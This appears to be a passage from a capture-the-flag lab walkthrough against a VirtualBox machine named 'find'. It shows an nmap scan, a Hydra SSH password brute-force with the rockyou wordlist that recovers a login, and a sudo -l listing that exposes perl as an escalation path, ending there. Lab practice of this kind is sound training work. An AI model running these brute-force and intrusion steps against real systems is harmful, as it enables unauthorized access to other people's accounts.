┌──(root㉿kali)-[~/Desktop/tmp] └─# nmap 192.168.31.145 Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-18 23:23 EDT Nmap scan report for 192.168.31.145 Host is up (0.0022s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:19:2F:ED (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds
┌──(root㉿kali)-[~/Desktop/tmp] └─# hydra -l missyred -P /usr/share/wordlists/rockyou.txt 192.168.31.145 ssh Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-18 23:30:36 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.31.145:22/ [22][ssh] host: 192.168.31.145 login: missyred password: iloveyou
ssh登录,sudo -l
1 2 3 4 5 6 7
missyred@find:~$ sudo -l [sudo] password for missyred: Matching Defaults entries for missyred on find: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User missyred may run the following commands on find: (kings) /usr/bin/perl